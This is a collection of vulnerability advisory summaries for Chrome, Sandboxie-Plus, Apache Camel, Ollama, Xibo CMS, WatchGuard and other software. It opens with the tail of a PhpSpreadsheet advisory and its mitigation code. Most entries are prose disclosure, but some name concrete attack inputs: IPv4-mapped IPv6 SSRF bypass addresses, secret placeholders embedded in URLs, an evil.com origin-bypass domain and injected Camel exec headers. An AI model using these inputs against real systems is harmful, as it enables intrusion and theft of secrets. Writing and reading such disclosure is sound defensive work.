} ``` Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist ](https://packagist.org)like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts. ## Suggested mitigations Use `is_file` only after making sure the filename does not contain any php wrapper: ```php $scheme = parse_url($filename, PHP_URL_SCHEME); // strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :) // since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge if ($scheme !== null && strlen($scheme) > 1) { throw new \PhpOffice\PhpSpreadsheet\Exception( "Stream wrappers are not permitted as file paths: {$filename}" ); } ``` or perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly: ```php $real = realpath($filename); // not php wrapper aware AFAIK if ($real === false) { throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}"); } // from here on, $real should be a clean absolute path so we can pass it to is_file() if (!is_file($real)) { throw new ... } ``` > Note: `stream_is_local()` would also not be safe here - as it considers `phar://` to be local and would not block it.
### Summary `OpenTelemetry.Resources.Azure` reads unbounded HTTP response bodies from the Azure VM remote instance metadata service endpoint into memory. This would allow an attacker-controlled endpoint or one acting as a Man-in-the-Middle (MitM) to cause excessive memory allocation and possible process termination (via Out of Memory (OOM)). ### Details The [`AzureVmMetaDataRequestor`](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/blob/171c6b81f88831641b56b470e6f92862e605013d/src/OpenTelemetry.Resources.Azure/AzureVmMetaDataRequestor.cs) class makes HTTP requests to the relevant Azure VM instance metadata service (`http://169.254.169.254`) to obtain metadata about the running process and its infrastructure. An attacker who controls the configured endpoint, or who can intercept traffic to them (MiTM), can return an arbitrarily large response body. This causes unbounded heap allocation in the consuming process, leading to high transient memory pressure, garbage-collection stalls, or an `OutOfMemoryException` that terminates the process. ### Impact Denial of Service (DoS). An attacker can destabilize or crash the application by forcing unbounded memory allocation through the Azure VM instance metadata HTTP response paths. ### Mitigating Factors The application's reachable Azure VM metadata endpoint needs to behave maliciously or be subject to MitM. In normal usage response bodies should not be excessively large. ### Patches Fixed in `OpenTelemetry.Resources.Azure` version `1.15.0-beta.2`. The fix (#4121) introduce changes that introduce limits to `HttpClient` requests so that the response body is streamed rather than buffered entirely in memory. Responses greater than 4 MiB are ignored. ### Workarounds - Disable the Azure VM resource detector. - Use network-level controls (firewall rules, mTLS, service mesh) to prevent Man-in-the-Middle (MitM) attacks on the Azure VM instance metadata endpoint. ### References - [#4121](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4121)
Netskope was notified about a potential gap in the Endpoint DLP Module for Netskope Client on Windows systems. The successful exploitation of the gap can potentially allow an unprivileged user to trigger an out-of-bounds read within a driver, leading to a Blue-Screen-of-Death (BSOD). Successful exploitation would require the Endpoint DLP module to be enabled in the client configuration. A successful exploit can potentially result in a denial-of-service for the local machine.
Local privilege escalation due to improper input validation. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212, Acronis Cyber Protect Cloud Agent (Windows) before build 42183.
Local privilege escalation due to improper input validation. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212, Acronis Cyber Protect Cloud Agent (Windows) before build 42183.
Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212.
Jenkins Microsoft Entra ID (previously Azure AD) Plugin 666.v6060de32f87d and earlier does not restrict the redirect URL after login, allowing attackers to perform phishing attacks.
Ollama for Windows contains a Remote Code Execution vulnerability in its update mechanism due to improper handling of attacker‑controlled HTTP response headers. When downloading updates, the application constructs local file paths using values derived from HTTP headers without validation. These values are passed directly to filepath.Join, allowing path traversal sequences (../) to be resolved and enabling files to be written outside the intended update staging directory. An attacker who can influence update responses can exploit this flaw to write arbitrary executables to attacker‑chosen locations accessible to the current user, including the Windows Startup directory. This allows execution of arbitrary executables. Critically, when chained with CVE‑2026‑42248 (Missing Signature Verification for Updates), an attacker can deliver malicious payloads that are written to sensitive locations and executed automatically. Because Ollama for Windows performs silent automatic updates and executes staged binaries without user interaction, this results in automatic and persistent code execution without user awareness. Maintainers of this project were notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Versions from 0.12.10 to 0.17.5 were tested and confirmed as vulnerable, other versions were not tested but might also be vulnerable.
Ollama for Windows does not perform integrity or authenticity verification of downloaded update executables. Unlike other platforms, the Windows implementation of the update verification routine unconditionally returns success so no digital signature or trust validation is performed before staging or executing update payloads, enabling attacker‑supplied executables to be accepted and later executed by the application. Critically, Ollama for Windows performs silent automatic updates, so the malicious payload may be installed automatically without user awareness. Maintainers of this project were notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Versions from 0.12.10 to 0.17.5 were tested and confirmed as vulnerable, other versions were not tested but might also be vulnerable.
Spring MVC and WebFlux applications are vulnerable to Denial of Service attacks when resolving static resources. More precisely, an application can be vulnerable when all the following are true: * the application is using Spring MVC or Spring WebFlux * the application is serving static resources from the file system * the application is running on a Windows platform When all the conditions above are met, the attacker can send malicious requests that are slow to resolve and that can keep HTTP connections in use. This can cause a Denial of Service on the application.
B1 Free Archiver v1.5.86 strips Mark of the Web (MotW) protections from files extracted from internet-downloaded archives, allowing untrusted executables to run without Windows Defender SmartScreen warnings. Attackers can deliver malware via email attachments or malicious downloads that, when extracted using this archiver, bypass Windows security prompts entirely. EPSS exploitation probability is minimal (0.01%) with no active exploitation or public POC identified, suggesting limited real-world targeting despite the 7.3 CVSS score and theoretical RCE capability.
Integer overflow in ANGLE in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)
Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)
Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)
Absolute path traversal in Deepractice PromptX up to version 2.4.0 allows remote unauthenticated attackers to read arbitrary files from the server by manipulating the path argument in document file handling functions (read_docx, read_xlsx, read_pptx, list_xlsx_sheets, read_pdf). Publicly available exploit code exists and the vendor has not responded to early disclosure, though CVSS 5.3 (AV:N/AC:L/PR:N/UI:N) indicates moderate information disclosure risk with no integrity or availability impact.
If `shutil.unpack_archive()` is given a ZIP archive with an absolute Windows path containing a drive (`C:\\...`) then the archive will be extracted outside the target directory which is different than other operating systems. Only Windows is affected by this vulnerability.
Insecure preserved inherited permissions vulnerability in Cerberus FTP Server on Windows allows Privilege Escalation.This issue has been resolved in Cerberus FTP Server: 2026.1
Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Apache Camel Camel-Coap component. Apache Camel's camel-coap component is vulnerable to Camel message header injection, leading to remote code execution when routes forward CoAP requests to header-sensitive producers (e.g. camel-exec) The camel-coap component maps incoming CoAP request URI query parameters directly into Camel Exchange In message headers without applying any HeaderFilterStrategy. Specifically, CamelCoapResource.handleRequest() iterates over OptionSet.getUriQuery() and calls camelExchange.getIn().setHeader(...) for every query parameter. CoAPEndpoint extends DefaultEndpoint rather than DefaultHeaderFilterStrategyEndpoint, and CoAPComponent does not implement HeaderFilterStrategyComponent; the component contains no references to HeaderFilterStrategy at all. As a result, an unauthenticated attacker who can send a single CoAP UDP packet to a Camel route consuming from coap:// can inject arbitrary Camel internal headers (those prefixed with Camel*) into the Exchange. When the route delivers the message to a header-sensitive producer such as camel-exec, camel-sql, camel-bean, camel-file, or template components (camel-freemarker, camel-velocity), the injected headers can alter the producer's behavior. In the case of camel-exec, the CamelExecCommandExecutable and CamelExecCommandArgs headers override the executable and arguments configured on the endpoint, resulting in arbitrary OS command execution under the privileges of the Camel process. The producer's output is written back to the Exchange body and returned in the CoAP response payload by CamelCoapResource, giving the attacker an interactive RCE channel without any need for out-of-band exfiltration. Exploitation prerequisites are minimal: a single unauthenticated UDP datagram to the CoAP port (default 5683). CoAP (RFC 7252) has no built-in authentication, and DTLS is optional and disabled by default. Because the protocol is UDP-based, HTTP-layer WAF/IDS controls do not apply. This issue affects Apache Camel: from 4.14.0 through 4.14.5, from 4.18.0 before 4.18.1, 4.19.0. Users are recommended to upgrade to version 4.18.1 or 4.19.0, fixing the issue.
The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from(\"imap://...\") or from(\"pop3://...\")) the inbound filter check is skipped and Camel-prefixed MIME headers are mapped unfiltered into the Exchange. An attacker who can deliver an email to a mailbox monitored by such a consumer can inject Camel-specific headers that, for some Camel components downstream of the mail consumer (such as camel-bean, camel-exec, or camel-sql), can alter the behaviour of the route. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177) and the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.1. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6.
The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was not applied to five non-HTTP HeaderFilterStrategy implementations: JmsHeaderFilterStrategy and ClassicJmsHeaderFilterStrategy in camel-jms, SjmsHeaderFilterStrategy in camel-sjms, CoAPHeaderFilterStrategy in camel-coap, and GooglePubsubHeaderFilterStrategy in camel-google-pubsub. Because those strategies use case-sensitive String.startsWith('Camel'/'camel') filtering while the Camel Exchange stores headers in a case-insensitive map, an attacker with JMS (or equivalent) producer access to the broker consumed by a Camel route can inject case-variant Camel internal headers, which are then resolved by downstream components such as camel-exec and camel-file using their canonical casing. This enables remote code execution and arbitrary file write on routes that forward JMS messages to header-driven components. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.
Cypher injection in LogonTracer prior to v2.0.0 allows remote attackers to alter database contents by submitting specially crafted Windows event log data. The vulnerability requires user interaction to load the malicious log data but results in integrity compromise of the underlying database due to improper input sanitization in Cypher query construction.
Authenticated local users can execute arbitrary code on Windows, macOS, and Linux via HTML injection in SiYuan desktop notification messages through version 3.6.4. The Electron-based desktop application mishandles notification rendering with unsafe settings (nodeIntegration enabled, contextIsolation disabled, webSecurity disabled), escalating XSS to full system compromise. Vendor-released patch available in version 3.6.5. No evidence of active exploitation (not in CISA KEV) or public exploit code at time of analysis.
Privilege escalation in Azure IoT Central enables authenticated attackers to gain unauthorized access to sensitive information and elevate their permissions across tenant boundaries. An attacker with low-privilege credentials can exploit exposed sensitive data over the network to compromise confidentiality, integrity, and availability of other tenant resources. Microsoft has published security guidance, but no independent confirmation of patch availability exists at time of analysis.
Xibo CMS before version 4.4.1 allows authenticated users to bypass access controls and view campaigns, regions, and reports belonging to other users by manually constructing preview URLs. The vulnerability affects any authenticated user with Layout Management, Campaign Management, or Report viewing privileges and results in unauthorized information disclosure with no impact on data integrity or availability.
Server-Side Request Forgery in Xibo CMS prior to version 4.4.1 allows high-privilege authenticated users with DataSet permissions to make arbitrary HTTP requests from the CMS server to internal or external resources, enabling infrastructure reconnaissance, cloud metadata access (e.g., AWS IMDS), and potential data exfiltration. Exploitation requires both 'Add DataSet' privilege and DataSet management capabilities, which are not default non-admin permissions, limiting the attack surface to trusted insiders or compromised administrative accounts.
Stored cross-site scripting in Xibo CMS versions prior to 4.4.1 allows authenticated users with notification creation privileges to inject arbitrary JavaScript into notification bodies that executes automatically in targeted users' browsers upon login without requiring user interaction. This vulnerability affects the notification interrupt feature and requires the attacker to possess both notification centre access and notification creation permissions, which are restricted to administrative roles by default.
Information disclosure in Canon production printers and office/small office multifunction printers allows authenticated administrators to access sensitive device information through crafted requests to the browser-based remote management interface. The vulnerability affects multiple printer models and requires high-privilege administrative access; no active exploitation has been confirmed at time of analysis, though the remote network vector and low attack complexity indicate practical exploitability by privileged internal users.
SQL injection in Xibo CMS versions 1.7 through 4.4.0 allows authenticated users with DataSet or Layout access privileges to extract and modify arbitrary database contents via crafted API filter parameters. The vulnerability affects a widely-deployed open source digital signage platform and has been addressed in version 4.4.1, with patches retroactively provided for out-of-support versions (3.3, 2.3, 1.8) indicating vendor awareness of active deployments on legacy versions. EPSS data not available, but the low attack complexity (AC:L) and network vector (AV:N) combined with the broad version range (nearly 7 years of releases) suggest significant exposure across installations.
Uncontrolled search path element in Microsoft Power Apps allows an unauthorized attacker to execute code over a network.
Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management allows an unauthorized attacker to perform spoofing over a network.
Improper access control in Microsoft Partner Center allows an authorized attacker to elevate privileges over a network.
Server-side request forgery (ssrf) in Microsoft Purview allows an unauthorized attacker to elevate privileges over a network.
Remote code execution affects ChromeDriver in Google Chrome versions prior to 148.0.7778.96 on Windows platforms. Exploitation requires user interaction with a malicious HTML page, enabling remote attackers to achieve arbitrary code execution with high impact to confidentiality, integrity, and availability. Vendor-released patch available (version 148.0.7778.96). No active exploitation confirmed in CISA KEV at time of analysis, though CVSS base score of 8.8 reflects significant potential impact if users visit attacker-controlled content.
Local privilege escalation in Google Chrome Chromoting (prior to 148.0.7778.96) on Windows allows attackers to gain elevated OS-level privileges by tricking users into opening a malicious file. While CVSS scores this as high severity (7.8), real-world risk is tempered by local access and required user interaction (CVSS: AV:L/UI:R). Vendor patch available in version 148.0.7778.96 released May 2026. No active exploitation (CISA KEV) or public exploit code identified at time of analysis.
Local privilege escalation in Google Chrome's Windows updater component allows unprivileged users to gain SYSTEM-level access by exploiting insufficient input validation when the updater processes a specially crafted malicious file. Affects all Chrome versions on Windows prior to 148.0.7778.96. Google has released a patched version (148.0.7778.96). No active exploitation confirmed by CISA KEV at time of analysis, though the local attack vector and medium severity rating suggest potential for targeted attacks in enterprise environments where Chrome auto-update may be delayed.
Integer overflow in Chrome's Dawn graphics API (WebGPU) enables sandbox escape on Windows systems when users visit attacker-controlled web pages. Affects all Chrome versions prior to 148.0.7778.96 on Windows platforms. Vendor-released patch available in Chrome 148.0.7778.96 (confirmed by Google Stable Channel release). CVSS 8.8 reflects high impact but requires user interaction. No public exploit code or CISA KEV listing identified at time of analysis, indicating targeted or proof-of-concept stage exploitation risk rather than widespread active exploitation.
Local privilege escalation in Google Chrome Chromoting (remote desktop component) allows authenticated Windows users to gain elevated system privileges through a race condition exploit triggered by a malicious file. Fixed in Chrome 148.0.7778.96. The vulnerability requires user interaction and high attack complexity (AC:H), limiting automated exploitation despite the 7.5 CVSS score. No public exploit identified at time of analysis, and not listed in CISA KEV.
Insufficient policy enforcement in Chrome's WebUI on Linux, Mac, Windows, and ChromeOS prior to 148.0.7778.96 allows a remote attacker with a compromised renderer process to bypass site isolation via a crafted HTML page, potentially exposing sensitive cross-site data. The vulnerability requires user interaction (UI:R) and prior renderer compromise, limiting its standalone exploitability. Vendor-released patch available in version 148.0.7778.96.
Remote code execution in Google Chrome for Windows below version 148.0.7778.96 allows unauthenticated attackers to execute arbitrary code within Chrome's sandbox via specially crafted HTML pages exploiting a use-after-free vulnerability in the WebRTC implementation. CVSS score of 8.8 reflects high impact across confidentiality, integrity, and availability. EPSS data not provided, but Google's 'High' severity classification and immediate patch release indicate active concern. No CISA KEV listing or public POC identified at time of analysis, though the vulnerability is already patched.
Use-after-free memory corruption in Chrome Remote Desktop (Chromoting) on Windows enables local privilege escalation to SYSTEM via malicious file interaction. Attackers with local access can gain OS-level administrative control by inducing users to open specially crafted files processed by the Chromoting component. Patch available in Chrome 148.0.7778.96. No evidence of active exploitation (not in CISA KEV), but the local attack vector with low complexity and high impact warrants immediate patching for Windows Chrome deployments, especially in multi-user environments where privilege boundaries are critical.
Sandbox escape in Google Chrome on Windows allows attackers who have already compromised the renderer process to break out of Chrome's security sandbox via a use-after-free flaw in the Fullscreen API. Affects Chrome versions prior to 148.0.7778.96 on Windows platforms. Google has released a patch (version 148.0.7778.96) and rated this High severity. No evidence of active exploitation (not in CISA KEV) or public proof-of-concept code at time of analysis, though the vulnerability requires initial renderer compromise making it a second-stage exploitation vector.
Sandbox escape in Google Chrome on Windows versions prior to 148.0.7778.96 allows attackers who have already compromised the renderer process to break out of Chrome's security sandbox via type confusion in the Accessibility subsystem. The attack requires user interaction with a malicious webpage and successful renderer compromise as a prerequisite, representing a critical escalation path in multi-stage attacks. Vendor-released patch available in Chrome 148.0.7778.96. No active exploitation confirmed (not in CISA KEV), and no public exploit code identified at time of analysis.
Sandbox escape in Google Chrome for Windows versions prior to 148.0.7778.96 allows remote attackers who have already compromised the renderer process to break out of the Chrome sandbox via a use-after-free vulnerability in the Aura UI framework. The attack requires user interaction with a specially crafted HTML page and has high attack complexity (AC:H), but grants complete control over confidentiality, integrity, and availability with changed scope (S:C). No active exploitation confirmed in CISA KEV at time of analysis. EPSS data not provided, but the vulnerability targets a browser component with over 3 billion users globally.
Integer overflow in Chrome's ANGLE graphics layer (Mac/Windows) enables heap corruption via malicious web pages. Remote attackers can achieve arbitrary code execution by tricking users into visiting crafted HTML content. Google patched this in Chrome 148.0.7778.96, marking it high severity. Users must interact with the malicious page, but no authentication is required. EPSS data not available; no CISA KEV listing indicates exploitation not yet confirmed in the wild, though the Chromium bug tracker may contain additional context.
Origin confusion in Tauri's is_local_url() function on Windows and Android allows remote attackers to invoke local-only IPC commands by hosting content on a domain whose first subdomain matches the application's custom URI scheme. An attacker can register a domain like http://app.evil.com/ to bypass origin validation when the target application uses an app:// custom protocol, gaining unauthorized access to backend functionality intended only for the application's own frontend. A public proof-of-concept demonstrates successful command invocation through this bypass.
Local privilege escalation in Johnson Controls AC2000 physical access control system (versions 10.6-12.x) allows authenticated local users to execute arbitrary code with elevated privileges by manipulating DLL search paths. The CWE-427 uncontrolled search path vulnerability enables attackers with low-privilege local access to plant malicious libraries that AC2000 loads during startup or operation, achieving high confidentiality and integrity impact. No public exploit code identified at time of analysis, and CVSS 4.0 local attack vector (AV:L) with low privileges required (PR:L) indicates this requires initial system access but minimal complexity once achieved.
Local privilege escalation in WatchGuard Agent for Windows allows authenticated users to execute arbitrary code with elevated system privileges through DLL hijacking. The agent searches for dependencies in user-controllable directories, enabling attackers with standard user credentials to plant malicious DLLs that load when the service starts. WatchGuard has released version 1.25.03.0000 to address this uncontrolled search path vulnerability (CWE-427).
Hard-coded cryptographic key in WatchGuard Agent for Windows enables local authenticated attackers to inject malicious code into existing agent processes, achieving high-impact confidentiality, integrity, and availability compromise. WatchGuard Agent versions prior to 1.25.03.0000 are affected. CVSS v4.0 score of 8.5 reflects local attack vector with low complexity and low privilege requirements, though no active exploitation (KEV) or public POC has been identified at time of analysis. The vulnerability's CWE-321 classification indicates embedded cryptographic material that could be extracted and reused for process injection attacks.
Privilege escalation in WatchGuard Agent for Windows allows authenticated local users to gain NT AUTHORITY\SYSTEM privileges via incorrect permissions in the patch management component. CVSS 7.3 with low attack complexity and local attack vector. No active exploitation or public exploit code identified at time of analysis. EPSS data not available - real-world risk depends on defender endpoint deployment environments where local user access is already established.
Stack-based buffer overflow in WatchGuard Agent discovery service on Windows enables adjacent attackers without authentication to crash the agent via crafted network packets. CVSS 7.1 (High) reflects adjacent network attack vector with high integrity impact. The vulnerability targets the discovery service component used for agent enrollment and network communication. No CISA KEV listing or public exploit code identified at time of analysis, though the local network attack vector limits exposure to adjacent attackers.
Stack-based buffer overflow in WatchGuard Agent's discovery service allows adjacent network attackers to crash the agent service without authentication. Affects Windows installations prior to version 1.25.03.0000. Vendor patch released addressing the vulnerability. SSVC framework indicates no active exploitation observed and manual exploitation required. While CVSS 7.1 (High) reflects network-adjacent access with high availability impact, actual risk is limited to denial-of-service - no code execution or data compromise possible per the CVSS vector (VC:N/VI:N/VA:H).
NULL pointer dereference in the Linux kernel ixgbevf driver crashes Hyper-V guest VMs during device probe, causing a kernel panic and complete denial of service. The regression was introduced when commit a7075f501bd3 added a .negotiate_features callback to ixgbe_mac_operations and populated it for the standard ops table (ixgbevf_mac_ops) but omitted it from the Hyper-V-specific table (ixgbevf_hv_mac_ops), leaving that pointer NULL on Hyper-V guests. Any Linux system running on Microsoft Hyper-V with an Intel ixgbevf virtual NIC is subject to an automatic kernel crash at module load or boot; no public exploit has been identified at time of analysis and EPSS is 0.02%, reflecting a narrow but reliable impact on the specific deployment combination.
Off-by-one error in Velocidex Velociraptor before version 0.76.5 on Windows and Linux causes denial of service when parsing specially crafted .evtx files through the parse_evtx VQL plugin. Local attackers with user-level privileges can crash the Velociraptor process by uploading or providing malformed event log files, disrupting forensic investigations and incident response operations. The vulnerability requires user interaction (file upload/selection) but grants an attacker both integrity and availability impact despite the CVSS 4.4 (Medium) rating.
Unauthenticated CRLF injection in AVideo's Scheduler plugin allows remote attackers to inject arbitrary calendar events into ICS files served from the victim's trusted domain, enabling high-credibility calendar phishing attacks. The vulnerable endpoint accepts attacker-controlled parameters without sanitization, passes them through an incomplete escape function that does not neutralize carriage-return/line-feed bytes, and constructs RFC 5545-compliant ICS calendar files containing injected VEVENT blocks. Exploitation requires only that the Scheduler plugin be enabled (common default) and user interaction to import the malicious .ics file; no authentication or special configuration is needed. A vendor-released patch is available.
Remote code execution in Grav CMS versions prior to 2.0.0-beta.2 allows authenticated administrators to deploy malicious PHP web shells by uploading crafted ZIP files through the Direct Install tool at /admin/tools/direct-install. The vulnerability combines insufficient ZIP archive content validation (Zip Slip primitive via path traversal) with the design-level acceptance of arbitrary plugin PHP code. Publicly available exploit code exists, demonstrating automated login, nonce extraction, malicious plugin upload, and persistent shell deployment. CVSS 9.1 (Critical) reflects network-accessible RCE with scope change, though exploitation requires high privileges (admin role). No EPSS or KEV data available at time of analysis.
Unauthenticated SSRF in MagicMirror ≤2.35.0 allows remote attackers to proxy arbitrary HTTP requests through the server, accessing cloud metadata services (AWS/GCP/Azure IMDSv1), internal network resources, and localhost services via the unrestricted `/cors` endpoint. The vulnerability is compounded by environment variable expansion: attackers can exfiltrate server-side secrets (API keys, database credentials) by embedding placeholders like `**SECRET_API_KEY**` in URLs, which the server resolves from `process.env` before making the request. Vendor-released patch version 2.36.0 disables the CORS proxy by default and implements IP blocklisting when enabled. Publicly available exploit code exists (PoC provided in GitHub advisory GHSA-ph6f-2cvq-79hq). No active exploitation confirmed at time of analysis.
Server-Side Request Forgery (SSRF) in open-webSearch's fetchWebContent MCP tool enables remote unauthenticated attackers to fetch arbitrary private-network URLs and receive full response bodies. Two defects in the `isPrivateOrLocalHostname` validator combine to allow bypass: bracketed IPv6 literals (e.g., `[::ffff:7f00:1]`) are never validated because Node's URL.hostname preserves brackets and Node's isIP() returns 0 for bracketed strings, and DNS resolution is never performed so attacker-controlled hostnames resolving to RFC1918 addresses pass unchecked. When deployed with HTTP transport enabled (documented configuration, active in Docker image), the MCP server binds to 0.0.0.0:3000 with CORS origin='*' and no authentication, exposing the vulnerable tool to any network attacker. Fixed in version 2.1.7. No public exploit identified at time of analysis, but vendor-supplied proof-of-concept demonstrates full exploit chain against AWS EC2 metadata and localhost services.
Complete SSRF protection bypass in ssrfcheck allows remote attackers to reach all private IPv4 ranges including cloud metadata endpoints (169.254.169.254) by encoding targets as IPv4-mapped IPv6 addresses (e.g., http://[::ffff:127.0.0.1]/). Node.js WHATWG URL parser normalizes these addresses to compressed hex form before the library's dot-notation-only regex executes, rendering all private IP checks ineffective. EPSS score unavailable for this recent CVE (2026), but the attack requires no authentication (PR:N), has low complexity (AC:L), and affects the latest version (1.3.0) with no vendor-released patch identified at time of analysis. Publicly available exploit code exists with complete proof-of-concept and automated verification scripts confirmed on Node.js v20.20.2.
Path traversal in MinIO's ReadMultiple internode storage-REST endpoint allows authenticated cluster peers or root-credential holders to read arbitrary files from the host filesystem outside configured drive roots. Distributed-erasure (multi-node) deployments are affected; single-node standalone deployments are not. The vulnerability exists in all releases from RELEASE.2022-07-24T01-54-52Z through RELEASE.2025-09-07T16-13-09Z and has been fixed as of MinIO AIStor RELEASE.2024-10-23T19-38-07Z (with security patch RELEASE.2026-04-14T21-32-45Z recommended). No public exploit code or active exploitation has been identified at time of analysis.
Sandboxie-Plus versions 1.17.2 and earlier are vulnerable to privilege escalation via a Time-of-Check-to-Time-of-Use (TOCTOU) race condition during addon installation. When a user initiates addon installation through the SandMan interface, the UpdUtil.exe process runs as SYSTEM and stages files in the user-writable %TEMP%\sandboxie-updater directory. An unprivileged local attacker can exploit the window between hash verification and file extraction to replace the addon cabinet file with a malicious executable, resulting in arbitrary code execution as SYSTEM without UAC prompts. Patch version 1.17.3 addresses this flaw; no active exploitation has been publicly confirmed, though the attack is trivially reproducible given local access and user interaction.
Sandboxie-Plus versions 1.17.2 and earlier contain a cryptographic implementation flaw in SbieIniServer::HashPassword that reduces SHA-1 password hash entropy from 160 bits to 80 bits by incorrectly shifting the high nibble of each byte right by 8 instead of 4, combined with an unsalted hashing scheme. This makes leaked or backed-up EditPassword hashes significantly easier to brute-force, enabling attackers with local access and low privileges to recover plaintext passwords through offline attack. The vulnerability is fixed in version 1.17.3.
Stack-based buffer overflow in Sandboxie-Plus SbieSvc service enables sandboxed processes to escape isolation and execute code as SYSTEM. Affected versions 1.17.2 and earlier allow malicious sandboxed code to overflow a fixed 160-wide-character stack buffer in NamedPipeServer::OpenHandler via crafted named pipe open requests, bypassing the fundamental security boundary Sandboxie provides. Fixed in version 1.17.3. EPSS data unavailable, no CISA KEV listing or public exploit identified at time of analysis, but the security boundary violation represents a complete defeat of Sandboxie's core function.
Stack-based buffer overflow in Sandboxie-Plus ProcessServer handlers allows local authenticated attackers to execute arbitrary code as SYSTEM or crash the SbieSvc service. The vulnerability affects versions 1.17.2 and earlier, stems from unsafe wcscpy operations on unchecked WCHAR fields from service pipe requests, and has been patched in version 1.17.3. The service pipe's NULL DACL permits any local process to connect and trigger the flaw before authorization checks execute, enabling privilege escalation from low-privileged local accounts. No public exploit code identified at time of analysis, though the technical details in the GitHub advisory provide sufficient information for skilled attackers to develop exploits.
Local privilege escalation to SYSTEM in Sandboxie-Plus 1.17.2 and earlier allows low-privileged interactive users to trigger stack buffer overflow in SbieSvc service via unauthenticated IPC, bypassing sandbox isolation controls. The vulnerability exists in the RunSbieCtrl handler which processes crafted messages before security checks and copies unbounded input into a 128-character stack buffer. Fixed in version 1.17.3. EPSS data unavailable; not listed in CISA KEV at time of analysis, but publicly disclosed via GitHub Security Advisory with technical details sufficient for exploit development.
Stack buffer overflow in Sandboxie-Plus SbieSvc proxy service enables SYSTEM privilege escalation from sandboxed processes, including Security Hardened Sandboxes. Attackers chain an information disclosure (returning up to 32KB uninitialized stack memory with ASLR/stack cookie bypass) with an unbounded memcpy overflow in the GetRawInputDeviceInfoSlave IPC handler. Intel CET shadow stacks block ROP exploitation but not the information leak itself. Vendor-released patch available in version 1.17.3. No public exploit identified at time of analysis, but attack complexity is rated high (AC:H) with low privilege requirements (PR:L), making this viable for motivated attackers targeting sandbox environments.
INI injection in Sandboxie-Plus versions 1.17.2 and earlier enables any local low-privilege user to bypass EditAdminOnly and ConfigPassword protections, inject malicious directives into the global Sandboxie.ini file, create unrestricted sandbox sections, and escalate to SYSTEM privileges. The background service fails to authorize IPC messages for UserSettings_* sections and does not sanitize CRLF characters in MSGID_SBIE_INI_ADD_SETTING and MSGID_SBIE_INI_SET_SETTING parameters, allowing section header injection. Fixed in version 1.17.3 released by the vendor. No CISA KEV listing or public exploit identified at time of analysis, but technical details in GitHub advisory provide sufficient information for exploit development.
Local denial of service in Sandboxie 1.17.2 and earlier allows unprivileged processes inside Standard Sandbox configurations to crash the Windows kernel (BSOD) by sending malformed IOCTL requests to the SandboxieDriverApi kernel driver. Fixed in version 1.17.3 released by Sandboxie-Plus. Security Hardened Sandbox configurations are not affected. No active exploitation confirmed (not in CISA KEV), but the vulnerability is trivially exploitable by any process within an affected sandbox, enabling local attackers or malicious sandboxed applications to force immediate system-wide service disruption.
Server-Side Request Forgery in edx-enterprise 7.0.2-7.0.4 enables Enterprise Admins to steal cloud credentials and scan internal networks. Authenticated users with the Enterprise Admin role-typically delegated to training managers, not platform operators-can inject arbitrary URLs into SAMLProviderConfig.metadata_source and trigger server-side HTTP requests to internal infrastructure. Publicly available exploit code exists (proof-of-concept in GitHub advisory GHSA-64cv-vxpr-j6vc). Vendor-released patch: edx-enterprise 7.0.5. This mirrors a previously patched SSRF in openedx-platform (GHSA-328g-7h4g-r2m9), indicating recurring pattern in SAML metadata handling across Open edX components.
OpenClaw versions 2026.4.10 through 2026.4.13 fail to enforce sender allowlist checks in the Microsoft Teams SSO invoke handler, allowing attackers to bypass authorization controls and access Teams SSO sign-in functionality without proper validation. The vulnerability affects unauthenticated remote attackers and has been patched in version 2026.4.14, which routes SSO invoke handling through the standard sender authorization path used by normal message handling.
Local privilege escalation in Amazon WorkSpaces for Windows versions before 2.6.2034.0 enables authenticated low-privileged users to write arbitrary files to protected system locations, achieving SYSTEM-level access. The vulnerability exploits a race condition (CWE-367) in the Skylight Workspace Config Service's log rotation mechanism. No public exploit or active exploitation confirmed at time of analysis, but local access requirement limits attack surface to compromised user accounts or insider threats.
